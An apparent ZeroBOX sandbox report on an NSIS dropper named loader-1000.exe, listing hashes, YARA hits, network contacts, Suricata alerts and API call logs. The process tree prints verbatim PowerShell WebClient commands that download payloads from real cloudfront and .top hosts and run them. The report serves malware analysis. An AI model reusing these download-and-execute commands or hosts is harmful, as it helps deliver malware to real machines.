Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 3, 2024, 3:33 p.m.	May 3, 2024, 3:37 p.m.

Size	49.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`d58a180c5d85448472b4e1007fae4b2a`
SHA256	`56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d`
CRC32	`B73CE2C2`
ssdeep	`1536:XferrLkSRoe8C4UZsys0Dh1duFpkvFI+Plh:Xfi3k+oWDBDh1duFpjWlh`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature NSIS_Installer - Null Soft Installer IsPE32 - (no description) UPX_Zero - UPX packed file

loader-1000.exe "C:\Users\test22\AppData\Local\Temp\loader-1000.exe"
2556
- cmd.exe "cmd" /c "C:\Users\test22\AppData\Local\Temp\nsbEF04.tmp\app.bat"
  2676
  - powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
    2748
  - powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
    2860
  - i1.exe i1.exe /SUB=2838 /str=one
    2984
  - powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
    3052

Name	Response	Post-Analysis Lookup
d2iv78ooxaijb6.cloudfront.net	A 54.192.60.34 A 54.192.60.39 A 54.192.60.91 A 54.192.60.53	54.192.60.34
d295fdouc92v9n.cloudfront.net	A 13.225.129.184 A 13.225.129.163 A 13.225.129.43 A 13.225.129.128	13.225.129.43
240429000936002.mjt.kqri92.top	A 179.43.158.2	94.156.35.76

IP Address	Status	Action
13.225.129.43	Active	Moloch
164.124.101.2	Active	Moloch
179.43.158.2	Active	Moloch
185.172.128.59	Active	Moloch
54.192.60.34	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 54.192.60.34:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 54.192.60.34:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49171 -> 54.192.60.34:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.172.128.59:80 -> 192.168.56.101:49172	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 192.168.56.101:49172 -> 185.172.128.59:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.59:80 -> 192.168.56.101:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.59:80 -> 192.168.56.101:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.59:80 -> 192.168.56.101:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49162 -> 13.225.129.43:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.172.128.59:80 -> 192.168.56.101:49172	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49178 -> 179.43.158.2:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49177 54.192.60.34:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49167 54.192.60.34:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49171 54.192.60.34:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1 192.168.56.101:49162 13.225.129.43:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.cloudfront.net	fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52

Queries for the computername (21 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 3, 2024, 3:33 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 3, 2024, 3:33 p.m.			0	0
IsDebuggerPresent May 3, 2024, 3:33 p.m.			0	0
IsDebuggerPresent May 3, 2024, 3:33 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: The system cannot find the file i2.bat. console_handle: 0x0000000b	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The remote server retur console_handle: 0x00000023	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: ned an error: (404) Not Found." console_handle: 0x0000002f	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: At line:1 char:111 console_handle: 0x0000003b	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: + $cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDown console_handle: 0x00000047	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: loadPlugin/1.5';$cli.DownloadFile <<<< ('https://d2iv78ooxaijb6.cloudfront.net/ console_handle: 0x00000053	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: load/dl.php?id=444&c=1000', 'i2.bat') console_handle: 0x0000005f	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW May 3, 2024, 3:33 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 126 events)

Time & API	Arguments	Status	Return
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d0a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033daa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033daa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033daa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033daa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033daa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033daa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d7a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033d8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033dc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033db60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033db60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ead50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2024, 3:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002eb710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 3, 2024, 3:33 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.59/ISetup1.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
suspicious_features	GET method with no useragent header	suspicious_request	GET https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Performs some HTTP requests (6 events)

request	GET http://185.172.128.59/ISetup1.exe
request	GET http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt
request	GET https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000
request	GET https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
request	GET https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000
request	GET https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

240429000936002.mjt.kqri92.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 430 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73322000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72421000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72422000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02755000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02756000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02757000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02758000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02759000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05131000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05133000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05134000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
